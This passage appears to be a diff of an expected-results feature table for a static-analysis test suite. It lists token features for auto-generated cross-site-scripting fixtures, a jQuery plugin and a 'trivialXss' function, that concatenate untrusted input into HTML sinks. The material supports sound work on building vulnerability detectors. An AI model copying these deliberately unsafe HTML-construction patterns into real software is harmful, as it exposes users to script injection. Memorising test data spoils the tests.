autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:5 | $ | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:5 | $ | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:5 | $ | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:5 | $ | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:5 | $ | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | $("#foo") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | $("#foo") | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | $("#foo") | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | $("#foo") | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | $("#foo") | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | exceptional return of $("#foo") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | exceptional return of $("#foo") | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | exceptional return of $("#foo") | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:13 | exceptional return of $("#foo") | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:18 | $("#foo").html | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:18 | $("#foo").html | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:18 | $("#foo").html | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:18 | $("#foo").html | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:18 | $("#foo").html | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | $("#foo ... span>") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | $("#foo ... span>") | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | $("#foo ... span>") | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | $("#foo ... span>") | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | $("#foo ... span>") | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | exceptional return of $("#foo ... span>") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | exceptional return of $("#foo ... span>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | exceptional return of $("#foo ... span>") | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | exceptional return of $("#foo ... span>") | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:5:12:54 | exceptional return of $("#foo ... span>") | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:7:12:12 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:7:12:12 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:7:12:12 | "#foo" | contextFunctionInterfaces | myPlugin(stuff, options) | @@ -22606,12 +149992,22 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:7:12:12 | "#foo" | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:7:12:12 | "#foo" | enclosingFunctionName | myPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:7:12:12 | "#foo" | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:15:12:18 | html | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:15:12:18 | html | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:15:12:18 | html | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:15:12:18 | html | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:15:12:18 | html | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:27 | "" | contextFunctionInterfaces | myPlugin(stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:27 | "" | contextSurroundingFunctionParameters | (stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:27 | "" | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:27 | "" | enclosingFunctionName | myPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:27 | "" | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:27 | "" | stringConcatenatedWith | -endpoint- options.foo + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:41 | " ... ons.foo | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:41 | " ... ons.foo | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:41 | " ... ons.foo | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:41 | " ... ons.foo | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:41 | " ... ons.foo | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:53 | " ... /span>" | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:53 | " ... /span>" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:53 | " ... /span>" | contextFunctionInterfaces | myPlugin(stuff, options) | @@ -22619,18 +150015,58 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:53 | " ... /span>" | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:53 | " ... /span>" | enclosingFunctionName | myPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:20:12:53 | " ... /span>" | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:37 | options | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:37 | options | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:37 | options | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:37 | options | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:37 | options | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:41 | options.foo | contextFunctionInterfaces | myPlugin(stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:41 | options.foo | contextSurroundingFunctionParameters | (stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:41 | options.foo | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:41 | options.foo | enclosingFunctionName | myPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:41 | options.foo | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:31:12:41 | options.foo | stringConcatenatedWith | '' -endpoint- '' | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:39:12:41 | foo | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:39:12:41 | foo | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:39:12:41 | foo | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:39:12:41 | foo | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:39:12:41 | foo | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:45:12:53 | "" | contextFunctionInterfaces | myPlugin(stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:45:12:53 | "" | contextSurroundingFunctionParameters | (stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:45:12:53 | "" | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:45:12:53 | "" | enclosingFunctionName | myPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:45:12:53 | "" | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:12:45:12:53 | "" | stringConcatenatedWith | '' + options.foo -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:5 | $ | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:5 | $ | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:5 | $ | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:5 | $ | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:5 | $ | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | $("#foo") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | $("#foo") | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | $("#foo") | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | $("#foo") | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | $("#foo") | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | exceptional return of $("#foo") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | exceptional return of $("#foo") | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | exceptional return of $("#foo") | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:13 | exceptional return of $("#foo") | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:18 | $("#foo").html | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:18 | $("#foo").html | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:18 | $("#foo").html | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:18 | $("#foo").html | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:18 | $("#foo").html | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | $("#foo ... span>") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | $("#foo ... span>") | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | $("#foo ... span>") | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | $("#foo ... span>") | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | $("#foo ... span>") | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | exceptional return of $("#foo ... span>") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | exceptional return of $("#foo ... span>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | exceptional return of $("#foo ... span>") | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | exceptional return of $("#foo ... span>") | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:5:14:48 | exceptional return of $("#foo ... span>") | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:7:14:12 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:7:14:12 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:7:14:12 | "#foo" | contextFunctionInterfaces | myPlugin(stuff, options) | @@ -22638,12 +150074,22 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:7:14:12 | "#foo" | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:7:14:12 | "#foo" | enclosingFunctionName | myPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:7:14:12 | "#foo" | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:15:14:18 | html | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:15:14:18 | html | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:15:14:18 | html | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:15:14:18 | html | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:15:14:18 | html | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:27 | "" | contextFunctionInterfaces | myPlugin(stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:27 | "" | contextSurroundingFunctionParameters | (stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:27 | "" | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:27 | "" | enclosingFunctionName | myPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:27 | "" | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:27 | "" | stringConcatenatedWith | -endpoint- stuff + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:35 | "" + stuff | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:35 | "" + stuff | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:35 | "" + stuff | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:35 | "" + stuff | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:35 | "" + stuff | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:47 | " ... /span>" | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:47 | " ... /span>" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:20:14:47 | " ... /span>" | contextFunctionInterfaces | myPlugin(stuff, options) | @@ -22663,12 +150109,71 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:39:14:47 | "" | enclosingFunctionName | myPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:39:14:47 | "" | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:14:39:14:47 | "" | stringConcatenatedWith | '' + stuff -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:1:1:0 | this | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:1:7 | this | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:1:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:1:7 | this | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:1:7 | this | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:1:7 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | 'arguments' object of function trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | 'arguments' object of function trivialXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | 'arguments' object of function trivialXss | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | 'arguments' object of function trivialXss | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | 'arguments' object of function trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | exceptional return of function trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | exceptional return of function trivialXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | exceptional return of function trivialXss | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | exceptional return of function trivialXss | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | exceptional return of function trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | functio ... html;\\n} | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | functio ... html;\\n} | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | return of function trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | return of function trivialXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | return of function trivialXss | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | return of function trivialXss | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:8:4:1 | return of function trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:17:1:26 | trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:17:1:26 | trivialXss | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:17:1:26 | trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:1:28:1:28 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:14 | html | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:14 | html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:14 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:14 | html | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:14 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html = ... /span>" | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html = ... /span>" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html = ... /span>" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html = ... /span>" | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:11:2:41 | html = ... /span>" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:25 | "" | contextFunctionInterfaces | trivialXss(s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:25 | "" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:25 | "" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:25 | "" | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:25 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:25 | "" | stringConcatenatedWith | -endpoint- s + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:29 | "" + s | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:29 | "" + s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:29 | "" + s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| 